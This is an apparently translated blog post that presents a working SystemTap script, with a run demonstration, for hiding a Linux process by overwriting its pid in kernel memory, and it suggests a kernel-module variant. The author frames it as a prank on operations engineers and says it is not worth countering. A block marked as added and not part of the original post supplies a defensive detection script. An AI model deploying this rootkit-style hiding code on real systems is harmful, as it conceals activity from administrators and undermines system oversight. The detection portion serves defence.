One line of code teaches you how to hide the Linux process

  • 2021-08-21 22:05:54
  • OfStack

Friends keep asking me how to hide a Linux process, and I always ask back: to what extent? Hidden from the kernel, or only from user space?

Everything you find online amounts to hooking procfs or a similar user-space scheme, and the explanations inevitably run long. To me these approaches are too big and complicated; anyone who just wants to see the effect right away is put off by such a pile of machinery.

This article introduces an unconventional way to hide a Linux process from users, with only one line of code:

Modify the pid of the process.

Note that this is only a minor hiding trick, so it is not worth countering; it is just a prank to play on a senior operations engineer.
target->pid = 0x7fffffff;

The complete script is as follows:


#!/usr/bin/stap -g
# hide.stp

global pid;

function hide(who:long)
%{
 struct task_struct *target;

 /* resolve the pid number passed on the command line to its task */
 target = pid_task(find_vpid(STAP_ARG_who), PIDTYPE_PID);
 if (target)   /* an unknown pid would otherwise dereference NULL */
  target->pid = 0x7fffffff;
%}

probe begin
{
 pid = $1;
 hide(pid);
 exit();
}

Let's try it:


[root@localhost system]# ./tohide &
[1] 403
[root@localhost system]# ./hide.stp 403
[root@localhost system]# 

Use the following loop to check; every binary that lists processes ultimately reads the same /proc entries:


for pid in $(ls /proc|awk '/^[0-9]+/{print $1}'); do 
 ls -l /proc/$pid/exe; 
done

Once it is gone from procfs, ps cannot see it either.

If stap in guru mode feels odd to you, write a standalone Linux kernel module instead and use the same pattern: modify, then return:


target->pid = xxxx;
return -1;

Isn't that far simpler than the various hook methods? Call it moving data instead of moving code.

A brief word on the principle.

When a task is created, its procfs directory entry is registered under its pid. When procfs lists or looks up that directory, it walks the task list using the pid as the key. 0x7fffffff (or any other plausible value) was never registered, so nothing can be displayed for it.
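The loop above only consults /proc, so it sees exactly what the trick removes. As an added example that is not part of the original post, here is a cross-view check in the style of unhide: it probes every pid number with kill(pid, 0) and reports the ones the kernel still answers for but /proc no longer lists. It assumes that signal delivery resolves the number through the kernel's pid table rather than the cached task->pid field, so the task keeps answering on its original number; verify that on the kernel you care about.

```python
import os

# Added defensive example, not from the original post. Assumption: kill(pid, 0)
# resolves the pid table entry, so an overwritten task->pid still answers here.

def proc_pids():
    """Pids that /proc lists as numeric directories (thread group leaders)."""
    return {int(n) for n in os.listdir("/proc") if n.isdigit()}

def probe_pids(candidates):
    """Pids that answer kill(pid, 0), i.e. pids the kernel can still resolve."""
    alive = set()
    for pid in candidates:
        try:
            os.kill(pid, 0)
        except ProcessLookupError:
            continue  # ESRCH: no such pid
        except PermissionError:
            pass      # EPERM: exists, owned by someone else
        alive.add(pid)
    return alive

def find_hidden(visible, alive):
    """Pure set logic: pids the kernel answers for but /proc does not list."""
    return alive - visible

def thread_of_listed(pid, visible):
    """Threads answer kill() and resolve under /proc on lookup but are absent
    from readdir; they count as hidden only if their Tgid is unlisted too."""
    try:
        with open(f"/proc/{pid}/status") as f:
            for line in f:
                if line.startswith("Tgid:"):
                    return int(line.split()[1]) in visible
    except OSError:
        pass
    return False

def scan():
    """One pass; rerun and intersect to drop pids that raced exit or start."""
    visible = proc_pids()
    with open("/proc/sys/kernel/pid_max") as f:
        upper = int(f.read())
    alive = probe_pids(range(1, upper + 1))
    return {p for p in find_hidden(visible, alive) if not thread_of_listed(p, visible)}

if __name__ == "__main__":
    for pid in sorted(scan() & scan()):
        print(f"pid {pid} answers kill(pid, 0) but has no /proc entry")
```

Run it as root so EPERM does not mask anything; a pid reported in both passes deserves a look with a kernel-side tool, since a task that the signal path finds but procfs cannot is exactly what a pid-table inconsistency looks like.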

Nothing more to it.

Again, don't bother countering the method in this article; something this simple is not worth countering at all, haha, is it?

See my earlier Rootkit series for a deeper look at how Linux processes are hidden in the kernel; there I also give countermeasures for each method.
